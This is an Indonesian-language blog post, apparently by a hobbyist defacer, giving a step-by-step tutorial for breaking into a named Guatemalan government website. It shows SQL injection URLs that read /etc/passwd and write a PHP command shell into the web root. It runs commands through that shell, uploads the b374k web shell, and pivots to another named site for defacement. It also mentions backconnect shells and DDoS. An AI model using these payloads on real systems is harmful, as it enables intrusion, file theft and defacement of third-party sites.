POC buat ngedeface++

2706 Views 0 Comment

Wah dah lama ga ngeblog

kali ini gw mau share beberapa teknik2(POC) buat ngedeface .

kalo yang sudah pada tau teknik2 ini jangan pada ngina

yah maklum nubie mau coba bikin artikel :p

yang sudah baca yah jangan lupa komen2nya

yah itung2 belajar bareng šŸ™‚

ok mulai aja deh ke tutor

hal yg diperlukan :

  1. berdoa
  2. siapin makanan ringan
  3. dan segelas kopi (java)
  4. koneksi internet + komputernya šŸ™‚

nah kalo udah pada siap liangsung pergi ke om google untuk melakukan pencarian dengan dork :

kemudian pilih deh web target yang memiliki vulnerability šŸ™‚

target : http://www.inacif.gob.gt/index.php?showPage=125&nwid=-7’+union+select+1,2,0x3C6120687265663D22687474703A2F2F6A616D6573306261737465722E7765622E6964223E6A616D6573306261737465723C2F613E,4,5,6,load_file(‘/etc/passwd’),8,9,10/*

ngedeface

setelah masuk ke website targget ubah url nya yg tadinya load_file(‘/etc/passwd’) menjadi

“<?php echo \'<pre>\’;system($_GET[\’cmd\’]);echo \'</pre>\’;?>”

dan diakhir url ditambahkan

+INTO+OUTFILE+”lokasi direktory(folder) yang permisionya 777/namashell.php”/*

real target : http://www.inacif.gob.gt/index.php?showPage=125&nwid=-7’+union+select+1,2,3,4,5,6,”<?php echo \'<pre>\’;system($_GET[\’cmd\’]);echo \'</pre>\’;?>”,8,9,10+INTO+OUTFILE+”/home/inacif/www/design/default/james0bastershell.php”/*


setelah berhasil membuat shell dari sql injection sebaiknya di coba terlebih dahulu apakah berhasil

atau tidak dengan menjalankan perintah ls -al pada cmd=

real target : http://www.inacif.gob.gt/design/default/james0bastershell.php?cmd=ls -al

shell sederhana

upload deh shell yg lebih familiar buat anda digunakan seperti saya b374k.php šŸ˜€ dengan perintah

download sebagai berikut :

upload

dan hasilnya sebagai berikut :

shell

bisa backconnect sama bind, lumayan buat DDOS atau apalah soalnya servernya ga make firewall.

kalo belom bisa ngeroot bisa pake teknik jumping karena di dalemnya ada 21 readable user directory

berikut hasil URL jumpingan dari http://www.inacif.gob.gt/ ke Ā http://www.cinde.com.gt/

URL : http://www.inacif.gob.gt/design/default/b374k.php?y=/home2/cinde/cinde-www/webcontrol/

dan berikut hasil defaceannya šŸ˜€

dan masih banyak lagi :p

sehubung banyak yg minta script scaner buat tuh web lewat YM oke ane berikan nih

http://www.inacif.gob.gt/design/default/james0basterscaner.php

scanerajib

NB : JANGAN RUSAK WEBNYA KALO MAU DIFACE JANGAN INDEXNYA, DEFACE HIDDEN AJA.

ITU BUAT BELAJAR BARENG2 JANGAN SERAKAH

0 Comments

Leave a Comment